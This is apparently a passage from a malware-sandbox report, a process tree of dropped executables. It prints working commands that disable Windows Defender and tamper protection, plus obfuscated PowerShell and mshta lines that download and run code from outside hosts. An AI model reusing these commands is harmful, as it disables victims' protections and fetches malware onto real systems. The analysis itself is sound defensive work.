  2⤵
  - Executes dropped EXE
  PID:1028
- - C:\Users\Admin\AppData\Local\Temp\DRfy5AFN.com
    "C:\Users\Admin\AppData\Local\Temp\DRfy5AFN.com"
    3⤵
    PID:5340
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\4A72.tmp\4A83.tmp\4A84.bat C:\Users\Admin\AppData\Local\Temp\DRfy5AFN.com"
      4⤵
      PID:5720
    - - C:\Windows\system32\sc.exe
        
        sc config WinDefend start=disabled
        5⤵
        
        PID:5244
    - - C:\Windows\system32\sc.exe
        
        sc config SecurityHealthService start=disabled
        5⤵
        
        PID:5964
    - - C:\Windows\system32\sc.exe
        
        sc config Sense start=disabled
        5⤵
        
        PID:5468
    - - C:\Windows\system32\sc.exe
        
        sc config WdNisDrv start=disabled
        5⤵
        Executes dropped EXE
        Drops file in Program Files directory
        
        PID:3844
    - - C:\Windows\system32\sc.exe
        
        sc config WdNisSvc start=disabled
        5⤵
        
        PID:5300
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f
        5⤵
        
        PID:5956
    - - C:\Windows\system32\reg.exe
        
        reg add "HKLM\SOFTWARE\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
        5⤵
        
        PID:5560
    - - C:\Windows\system32\reg.exe
        
        reg add "HKLM\SOFTWARE\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
        5⤵
        
        PID:5300
    - - C:\Windows\system32\reg.exe
        
        reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
        5⤵
        
        PID:6468
    - - C:\Windows\system32\reg.exe
        
        reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtection" /t REG_DWORD /d "0" /f
        5⤵
        
        PID:6676
    - - C:\Windows\system32\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\MRT" /v "DontOfferThroughWUAU" /t REG_DWORD /d "1" /f
        5⤵
        
        PID:7088
    - - C:\Windows\system32\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\MRT" /v "DontReportInfectionInformation" /t REG_DWORD /d "1" /f
        5⤵
        
        PID:6656
    - - C:\Windows\system32\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
        5⤵
        
        PID:4156
    - - C:\Windows\system32\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
        5⤵
        
        PID:6772
    - - C:\Windows\system32\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
        5⤵
        
        PID:4100
    - - C:\Windows\system32\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
        5⤵
        
        PID:3176
    - - C:\Windows\system32\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
        5⤵
        
        PID:6332
    - - C:\Windows\system32\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
        5⤵
        
        PID:5948
    - - C:\Windows\system32\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\SmartScreen" /v "ConfigureAppInstallControlEnabled" /t REG_DWORD /d "0" /f
        5⤵
        
        PID:6332
    - - C:\Windows\system32\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /t REG_DWORD /d "0" /f
        5⤵
        
        PID:6412
    - - C:\Windows\system32\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f
        5⤵
        
        PID:6508
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Appx" /s /k /f "SecHealthUI" | find /i "SecHealthUI"
        5⤵
        
        PID:6268
      - C:\Windows\system32\reg.exe
        
        reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Appx" /s /k /f "SecHealthUI"
        6⤵
        
        PID:7252
      - C:\Windows\system32\find.exe
        
        find /i "SecHealthUI"
        6⤵
        
        PID:7320
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Appx\AppxAllUserStore\InboxApplications\Microsoft.Windows.SecHealthUI_10.0.15063.0_neutral_neutral_cw5n1h2txyewy" /f
        5⤵
        
        PID:7976
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Appx\AppxAllUserStore\S-1-5-21-1594587808-2047097707-2163810515-1000\Microsoft.Windows.SecHealthUI_10.0.15063.0_neutral_neutral_cw5n1h2txyewy" /f
        5⤵
        
        PID:7452
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v SettingsPageVisibility
        5⤵
        
        PID:5092
      - C:\Windows\system32\reg.exe
        
        reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v SettingsPageVisibility
        6⤵
        
        PID:7908
    - - C:\Windows\system32\reg.exe
        
        reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "SettingsPageVisibility" /t REG_SZ /d "hide:windowsdefender;" /f
        5⤵
        
        PID:4456
    - - C:\Windows\system32\reg.exe
        
        reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Notifications\Settings\Windows.Defender.SecurityCenter" /v "Enabled" /t REG_DWORD /d "0" /f
        5⤵
        
        PID:7808
    - - C:\Windows\system32\reg.exe
        
        reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Notifications\Settings\Windows.SystemToast.SecurityAndMaintenance" /v "Enabled" /t REG_DWORD /d "0" /f
        5⤵
        
        PID:7308
- - C:\Users\Admin\AppData\Local\Temp\oLx9iNKn.com
    "C:\Users\Admin\AppData\Local\Temp\oLx9iNKn.com"
    3⤵
    PID:6252
  - - C:\Windows\System32\mshta.exe
      "C:\Windows\System32\mshta.exe" https://ia601408.us.archive.org/23/items/fix.hta-ert/FIX.hta_ert.txt
      4⤵
      PID:7352
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $TRUMP ='https://ia601409XXXusXXXarchiveXXXorg/7/items/fixmix_fix_4348843584358435/fixmix_fix_4348843584358435XXXtxt'.Replace('XXX','.');$Shib='24=42=20=3d=27=45=54=48=20=43=4f=49=4e=74=2e=57=54=46=20=43=4f=49=4e=6c=49=4f=53=4e=54=27=2e=52=65=70=6c=61=63=65=28=27=45=54=48=20=43=4f=49=4e=27=2c=27=6e=45=27=29=2e=52=65=70=6c=61=63=65=28=27=54=46=20=43=4f=49=4e=27=2c=27=45=62=43=27=29=2e=52=65=70=6c=61=63=65=28=27=4f=53=27=2c=27=65=27=29=3b=24=43=43=20=3d=20=27=44=4f=53=20=43=4f=49=4e=20=4c=53=4f=53=43=4f=49=4e=6e=47=27=2e=52=65=70=6c=61=63=65=28=27=53=20=43=4f=49=4e=20=27=2c=27=57=6e=27=29=2e=52=65=70=6c=61=63=65=28=27=53=4f=27=2c=27=6f=61=44=27=29=2e=52=65=70=6c=61=63=65=28=27=43=4f=49=4e=27=2c=27=54=72=49=27=29=3b=24=41=20=3d=27=49=60=45=6f=73=20=43=4f=49=4e=60=57=60=42=54=43=20=43=4f=49=4e=6a=60=45=54=48=20=43=4f=49=4e=20=24=42=29=2e=24=43=43=28=24=54=52=55=4d=50=29=27=2e=52=65=70=6c=61=63=65=28=27=6f=73=20=43=4f=49=4e=27=2c=27=58=28=6e=60=65=27=29=2e=52=65=70=6c=61=63=65=28=27=42=54=43=20=43=4f=49=4e=27=2c=27=2d=4f=62=27=29=2e=52=65=70=6c=61=63=65=28=27=54=48=20=43=4f=49=4e=27=2c=27=60=63=60=54=27=29=3b=26=28=27=49=27=2b=27=45=58=27=29=28=24=41=20=2d=4a=6f=69=6e=20=27=27=29=7c=26=28=27=49=27=2b=27=45=58=27=29=3b';Invoke-Expression (-join ($Shib -split '=' | ? { $_ } | % { [char][convert]::ToUInt32($_,16) }))
        5⤵
        
        PID:9324
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe"
        6⤵
        
        PID:15448
- - C:\Users\Admin\AppData\Local\Temp\Q4NcWvZT.com
    "C:\Users\Admin\AppData\Local\Temp\Q4NcWvZT.com"
    3⤵
    PID:6524
  - - C:\Windows\System32\mshta.exe
      "C:\Windows\System32\mshta.exe" https://kmsauto.us/1/FIX.hta
      4⤵
      PID:5632
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $TRUMP ='https://kmsautoXXXus/1/fixXXXtxt'.Replace('XXX','.');$Shib='24=42=20=3d=27=45=54=48=20=43=4f=49=4e=74=2e=57=54=46=20=43=4f=49=4e=6c=49=4f=53=4e=54=27=2e=52=65=70=6c=61=63=65=28=27=45=54=48=20=43=4f=49=4e=27=2c=27=6e=45=27=29=2e=52=65=70=6c=61=63=65=28=27=54=46=20=43=4f=49=4e=27=2c=27=45=62=43=27=29=2e=52=65=70=6c=61=63=65=28=27=4f=53=27=2c=27=65=27=29=3b=24=43=43=20=3d=20=27=44=4f=53=20=43=4f=49=4e=20=4c=53=4f=53=43=4f=49=4e=6e=47=27=2e=52=65=70=6c=61=63=65=28=27=53=20=43=4f=49=4e=20=27=2c=27=57=6e=27=29=2e=52=65=70=6c=61=63=65=28=27=53=4f=27=2c=27=6f=61=44=27=29=2e=52=65=70=6c=61=63=65=28=27=43=4f=49=4e=27=2c=27=54=72=49=27=29=3b=24=41=20=3d=27=49=60=45=6f=73=20=43=4f=49=4e=60=57=60=42=54=43=20=43=4f=49=4e=6a=60=45=54=48=20=43=4f=49=4e=20=24=42=29=2e=24=43=43=28=24=54=52=55=4d=50=29=27=2e=52=65=70=6c=61=63=65=28=27=6f=73=20=43=4f=49=4e=27=2c=27=58=28=6e=60=65=27=29=2e=52=65=70=6c=61=63=65=28=27=42=54=43=20=43=4f=49=4e=27=2c=27=2d=4f=62=27=29=2e=52=65=70=6c=61=63=65=28=27=54=48=20=43=4f=49=4e=27=2c=27=60=63=60=54=27=29=3b=26=28=27=49=27=2b=27=45=58=27=29=28=24=41=20=2d=4a=6f=69=6e=20=27=27=29=7c=26=28=27=49=27=2b=27=45=58=27=29=3b';Invoke-Expression (-join ($Shib -split '=' | ? { $_ } | % { [char][convert]::ToUInt32($_,16) }))
        5⤵
        
        PID:9988
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe"
        6⤵
        
        PID:12876
- C:\Users\Admin\Documents\1YlwFhvu7moCxPYC5u2bgMAd.exe
  "C:\Users\Admin\Documents\1YlwFhvu7moCxPYC5u2bgMAd.exe"
  2⤵
  - Executes dropped EXE
  PID:1060
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 1060 -s 772
    3⤵
    - Program crash
    PID:5432
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 1060 -s 820
    3⤵
    - Program crash
    PID:6116
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 1060 -s 840
    3⤵
    - Program crash
    PID:5756
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 1060 -s 792
    3⤵
    - Program crash
    PID:5564
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 1060 -s 856
    3⤵
    - Program crash
    PID:5372
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\7490932713.exe"
    3⤵
    PID:8072
  - - C:\Users\Admin\AppData\Local\Temp\7490932713.exe
      "C:\Users\Admin\AppData\Local\Temp\7490932713.exe"
      4⤵
      PID:5380
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 1060 -s 1768
    3⤵
    - Program crash
    PID:6344
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\1456821194.exe"
    3⤵
    PID:356
  - - C:\Users\Admin\AppData\Local\Temp\1456821194.exe
      "C:\Users\Admin\AppData\Local\Temp\1456821194.exe"
      4⤵
      PID:4604
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 1060 -s 1728
    3⤵
    - Program crash
    PID:8568
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c taskkill /im "1YlwFhvu7moCxPYC5u2bgMAd.exe" /f & erase "C:\Users\Admin\Documents\1YlwFhvu7moCxPYC5u2bgMAd.exe" & exit
    3⤵
    PID:1440
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /im "1YlwFhvu7moCxPYC5u2bgMAd.exe" /f
      4⤵
      Kills process with taskkill
      PID:4564
- C:\Users\Admin\Documents\Wypf9zCn4_BOvedTpo4Kwuir.exe
  "C:\Users\Admin\Documents\Wypf9zCn4_BOvedTpo4Kwuir.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:920
- - C:\Users\Admin\AppData\Roaming\7196641.exe
    "C:\Users\Admin\AppData\Roaming\7196641.exe"
    3⤵
    PID:6032
- - C:\Users\Admin\AppData\Roaming\5923047.exe
    "C:\Users\Admin\AppData\Roaming\5923047.exe"
    3⤵
    PID:4672
- - C:\Users\Admin\AppData\Roaming\4056222.exe
    "C:\Users\Admin\AppData\Roaming\4056222.exe"
    3⤵
    PID:6084
- - C:\Users\Admin\AppData\Roaming\8601503.exe
    "C:\Users\Admin\AppData\Roaming\8601503.exe"
    3⤵
    PID:5244
- - C:\Users\Admin\AppData\Roaming\2329176.exe
    "C:\Users\Admin\AppData\Roaming\2329176.exe"
    3⤵
    PID:5764
- C:\Users\Admin\Documents\ga9C6w445x_E3gCnbvvbBnHR.exe
  "C:\Users\Admin\Documents\ga9C6w445x_E3gCnbvvbBnHR.exe"
  2⤵
  - Executes dropped EXE
  PID:4004
- C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
  "C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe"
  2⤵
  - Executes dropped EXE
  PID:824
- - C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    3⤵
    PID:5096
- - C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    3⤵
    PID:740
- - C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    3⤵
    PID:196
- - C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    3⤵
    PID:5024
- - C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    3⤵
    PID:4740
- - C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    3⤵
    PID:196
- - C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    3⤵
    PID:5308
- - C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    3⤵
    PID:5876
- - C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    3⤵
    PID:5476
- - C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    3⤵
    PID:6112
- - C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    3⤵
    PID:5932
- - C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    3⤵
    PID:6300
- - C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    3⤵
    PID:6840
- - C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    3⤵
    PID:4848
- - C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    3⤵
    PID:6688
- - C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    3⤵
    PID:4392
- - C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    3⤵
    PID:4792
- - C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    3⤵
    PID:6532
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 6532 -s 24
      4⤵
      Program crash
      PID:4112
- - C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    3⤵
    PID:6752
- - C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    3⤵
    PID:6720
- - C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    3⤵
    PID:7596
- - C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    3⤵
    PID:7968
- - C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    3⤵
    PID:6580
- - C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    3⤵
    PID:7852
- - C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    3⤵
    PID:7684
- - C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    3⤵
    PID:8004
- - C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    3⤵
    PID:5944
- - C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    3⤵
    PID:7856
- - C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    3⤵
    PID:8368
- - C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    3⤵
    PID:8612
- - C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    3⤵
    PID:8888
- - C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    3⤵
    PID:9176
- - C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    3⤵
    PID:8672
- - C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    3⤵
    PID:3632
- - C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    3⤵
    PID:9028
- - C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    3⤵
    PID:9084
- - C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    3⤵
    PID:6904
- - C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    3⤵
    PID:8332
- - C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    3⤵
    PID:6716
- - C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    3⤵
    PID:4832
- - C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    3⤵
    PID:8852
- - C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    3⤵
    PID:9332
- - C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    3⤵
    PID:9660
- - C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    3⤵
    PID:10060
- - C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    3⤵
    PID:9616
- - C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    3⤵
    PID:7544
- - C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    3⤵
    PID:10192
- - C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    3⤵
    PID:8472
- - C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    3⤵
    PID:8524
- - C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    3⤵
    PID:8188
- - C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    3⤵
    PID:10384
- - C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    3⤵
    PID:10832
- - C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    3⤵
    PID:11236
- - C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    3⤵
    PID:7380
- - C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    3⤵
    PID:10740
- - C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    3⤵
    PID:10856
- - C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    3⤵
    PID:11344
- - C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    3⤵
    PID:11736
- - C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    3⤵
    PID:11992
- - C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    3⤵
    PID:12184
- - C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    3⤵
    PID:11520
- - C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    3⤵
    PID:11908
- - C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    3⤵
    PID:12152
- - C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    3⤵
    PID:11572
- - C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    3⤵
    PID:11720
- - C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    3⤵
    PID:11760
- - C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    3⤵
    PID:12280
- - C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    3⤵
    PID:10164
- - C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    3⤵
    PID:11156
- - C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    3⤵
    PID:1832
- - C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    3⤵
    PID:60
- - C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    3⤵
    PID:8424
- - C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    3⤵
    PID:3568
